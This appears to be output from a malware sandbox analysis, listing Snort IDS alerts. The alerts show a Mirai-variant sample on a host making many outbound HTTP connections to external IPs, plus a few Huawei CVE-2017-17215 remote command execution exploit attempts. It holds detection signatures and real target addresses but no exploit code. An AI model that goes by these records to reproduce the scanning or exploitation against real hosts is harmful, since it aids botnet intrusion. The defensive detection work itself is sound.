    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33184 -> 95.100.126.186:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47394 -> 95.129.213.253:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37930 -> 95.101.216.66:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52918 -> 95.86.97.213:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41702 -> 88.245.209.214:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57558 -> 112.125.190.145:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37620 -> 95.100.117.80:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37476 -> 95.163.236.126:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52172 -> 88.249.14.162:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54728 -> 95.47.252.137:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41336 -> 95.211.107.91:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41966 -> 95.131.50.39:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36846 -> 95.107.162.112:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42666 -> 95.86.120.25:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42834 -> 95.56.124.149:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55410 -> 112.121.166.214:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43246 -> 112.196.10.177:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41482 -> 95.101.219.189:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39580 -> 95.216.62.168:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58462 -> 95.102.135.140:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48648 -> 95.86.69.160:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57296 -> 95.100.114.52:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42456 -> 95.216.99.183:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36820 -> 112.160.181.74:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47178 -> 112.163.104.233:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53244 -> 95.100.73.75:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58966 -> 95.214.235.82:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52416 -> 95.100.208.211:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43148 -> 95.216.204.48:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47020 -> 95.101.250.61:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53926 -> 95.100.226.192:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33002 -> 95.57.137.36:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43966 -> 95.100.0.246:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52712 -> 88.207.209.221:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49002 -> 88.198.133.128:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39226 -> 88.208.6.245:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52550 -> 95.189.99.223:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54412 -> 95.101.201.65:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47104 -> 95.100.190.60:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47302 -> 95.216.8.58:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56746 -> 112.167.224.175:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44276 -> 112.50.109.210:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44272 -> 112.50.109.210:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55076 -> 112.213.90.148:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33224 -> 95.100.83.78:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55812 -> 95.161.215.218:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53178 -> 95.153.254.50:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39038 -> 95.101.7.88:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41064 -> 95.85.215.125:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59920 -> 95.101.220.145:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53830 -> 95.63.34.246:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50604 -> 95.101.88.33:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44130 -> 95.216.203.187:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38742 -> 95.217.73.211:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34472 -> 95.170.155.166:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37864 -> 95.154.146.207:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36514 -> 88.99.174.216:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59880 -> 88.173.190.85:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33616 -> 88.126.142.168:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37028 -> 88.204.207.169:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59908 -> 88.173.190.85:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40644 -> 95.101.174.24:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49592 -> 95.128.203.39:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59332 -> 95.31.211.36:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56340 -> 95.86.88.217:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53404 -> 112.223.134.189:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40762 -> 95.111.230.73:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35558 -> 95.217.154.177:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38940 -> 112.83.37.223:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56936 -> 112.74.184.114:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53220 -> 112.74.166.241:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59932 -> 112.78.220.5:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41550 -> 95.100.218.149:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57756 -> 88.99.132.131:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57614 -> 88.221.141.85:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50478 -> 88.221.182.96:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44874 -> 88.197.28.193:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47636 -> 95.100.183.33:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44142 -> 95.171.29.14:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44240 -> 95.100.119.168:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43946 -> 95.78.236.228:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54302 -> 88.221.62.159:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40288 -> 112.172.214.85:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46266 -> 112.240.60.75:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46284 -> 112.240.60.75:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46288 -> 112.240.60.75:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51086 -> 95.111.198.243:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57400 -> 88.183.165.213:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58096 -> 88.215.215.157:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34030 -> 88.119.193.246:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51932 -> 88.135.184.155:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48056 -> 112.125.164.108:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42230 -> 88.198.84.97:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45628 -> 88.221.5.184:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59084 -> 88.221.226.113:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58768 -> 88.201.61.143:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58766 -> 88.201.61.143:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36554 -> 112.126.97.200:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44398 -> 112.126.68.209:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33220 -> 112.133.231.202:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57110 -> 95.164.248.64:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35126 -> 95.46.157.132:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44166 -> 95.115.37.148:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52216 -> 95.101.156.153:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57626 -> 112.74.55.225:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48170 -> 112.125.164.108:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60104 -> 95.101.240.120:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57572 -> 95.80.205.108:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58616 -> 95.164.39.48:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60638 -> 95.128.199.186:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57384 -> 95.98.93.183:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43060 -> 95.164.172.28:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38688 -> 95.89.95.168:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34166 -> 95.100.131.178:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46302 -> 95.100.68.253:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54086 -> 95.217.90.221:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46552 -> 95.0.117.93:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59366 -> 95.196.101.188:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:56054 -> 95.100.3.93:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49672 -> 95.101.242.160:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36332 -> 95.100.229.153:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60386 -> 95.100.188.43:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34282 -> 95.110.233.143:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50308 -> 95.175.8.242:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33532 -> 95.167.157.242:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55982 -> 112.216.54.251:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47438 -> 112.160.31.66:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42488 -> 112.213.39.124:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46166 -> 95.100.186.32:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51134 -> 95.128.73.12:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43024 -> 95.143.183.211:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59446 -> 95.216.8.180:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39078 -> 88.221.79.146:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:49464 -> 95.101.40.155:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53492 -> 95.100.33.29:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55628 -> 95.86.118.214:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50762 -> 112.197.148.238:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43426 -> 95.100.185.128:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53514 -> 95.100.33.29:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53536 -> 95.46.192.184:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51260 -> 95.100.81.16:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:43320 -> 95.166.126.21:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53378 -> 95.217.239.20:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54016 -> 95.217.164.175:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51864 -> 95.57.65.116:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53820 -> 95.57.54.199:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38746 -> 112.74.112.174:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44384 -> 112.164.170.70:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40242 -> 112.147.130.77:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35506 -> 88.213.248.173:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39100 -> 88.221.16.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59636 -> 112.125.127.42:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38814 -> 112.74.112.174:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55184 -> 88.6.25.48:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33048 -> 112.163.49.112:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58658 -> 112.122.159.65:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58660 -> 112.122.159.65:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:32994 -> 95.101.252.171:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44324 -> 95.216.208.68:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:38718 -> 95.86.123.120:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46108 -> 95.56.138.74:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37162 -> 112.92.40.33:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53534 -> 112.125.17.111:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50730 -> 112.196.61.73:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:35944 -> 112.78.126.49:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57872 -> 112.166.103.4:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:41008 -> 88.99.32.73:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58348 -> 95.101.237.41:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:50384 -> 95.110.201.37:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37078 -> 95.216.29.212:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:53618 -> 88.214.20.17:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58422 -> 88.17.252.123:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:45022 -> 88.248.22.141:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:48526 -> 88.210.102.13:80
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33108 -> 197.221.180.247:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33108 -> 197.221.180.247:37215
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42318 -> 95.129.213.226:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52808 -> 95.216.161.5:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:46492 -> 88.28.197.41:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:47128 -> 95.100.51.159:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:37924 -> 95.100.206.154:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:44960 -> 95.86.89.138:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:33310 -> 95.38.89.113:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55676 -> 88.221.143.83:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59672 -> 88.198.123.203:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:57322 -> 88.134.149.207:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:42326 -> 88.129.13.196:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:34710 -> 112.161.195.128:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51546 -> 112.136.164.10:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51302 -> 112.49.30.164:80
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55408 -> 41.47.63.217:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55408 -> 41.47.63.217:37215
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:39766 -> 88.198.110.53:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:58982 -> 88.99.149.202:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51316 -> 112.49.30.164:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55374 -> 88.99.70.232:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:40834 -> 112.184.189.138:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:59814 -> 112.197.130.99:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:51626 -> 112.136.164.10:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:52298 -> 112.185.195.206:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:54104 -> 88.99.141.175:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:36280 -> 88.101.25.207:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:60964 -> 95.101.226.197:80
    Source: TrafficSnort IDS: 2839471 ETPRO TROJAN Mirai Variant User-Agent (Outbound) 192.168.2.23:55456 -> 95.173.100.142:80
